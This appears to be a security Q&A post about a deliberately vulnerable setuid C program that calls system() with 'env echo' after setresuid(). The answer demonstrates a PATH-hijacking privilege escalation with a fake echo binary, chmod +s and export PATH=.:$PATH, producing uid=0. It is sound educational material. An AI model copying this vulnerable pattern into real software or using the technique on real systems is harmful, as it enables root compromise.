What is vulnerable about this C code?


Question

#define _GNU_SOURCE   /* setresuid()/setresgid() are GNU extensions on glibc */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;
    gid = getegid();   /* effective ids: root if the binary is set-uid root */
    uid = geteuid();

    /* make real == effective == saved, so a child shell does not drop them */
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* "env echo" is resolved through the caller-controlled PATH */
    system("/usr/bin/env echo and now what?");

    return 0;
}


The way I understand it, the code above allows arbitrary code (or program) execution — what makes this vulnerable, and how does one take advantage of this?

Answer


You can override the PATH variable to point to a directory with your custom version of echo and since echo is executed using env, it isn't treated as a built-in.

This constitutes a vulnerability only if the code is run as a privileged user.


In the example below file v.c contains the code from the question.

$ cat echo.c
#include <stdio.h>
#include <unistd.h>

int main() {
  printf("Code run as uid=%d\n", getuid());
}
$ cc -o echo echo.c
$ cc -o v v.c
$ sudo chown root v
$ sudo chmod +s v
$ ls -l
total 64
-rwxr-xr-x  1 user     group  8752 Nov 29 01:55 echo
-rw-r--r--  1 user     group    99 Nov 29 01:54 echo.c
-rwsr-sr-x  1 root     group  8896 Nov 29 01:55 v
-rw-r--r--  1 user     group   279 Nov 29 01:55 v.c
$ ./v
and now what?
$ export PATH=.:$PATH
$ ./v
Code run as uid=0
$ 


Note that the setting of real user ID, effective user ID and saved set-user-ID by a call to setresuid() before the call to system() in the vulnerable code posted in the question allows one to exploit the vulnerability even when only effective user ID is set to a privileged user ID and real user ID remains unprivileged (as is for example the case when relying on set-user-ID bit on a file as above). Without the call to setresuid() the shell run by system() would reset the effective user ID back to the real user ID making the exploit ineffective. However, in the case when the vulnerable code is run with real user ID of a privileged user, system() call alone is enough. Quoting sh man page:


If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, no startup files are read, shell functions are not inherited from the environment, the SHELLOPTS variable, if it appears in the environment, is ignored, and the effective user id is set to the real user id. If the -p option is supplied at invocation, the startup behavior is the same, but the effective user id is not reset.


Also, note that setresuid() isn't portable, but setuid() or setreuid() may also be used to the same effect.
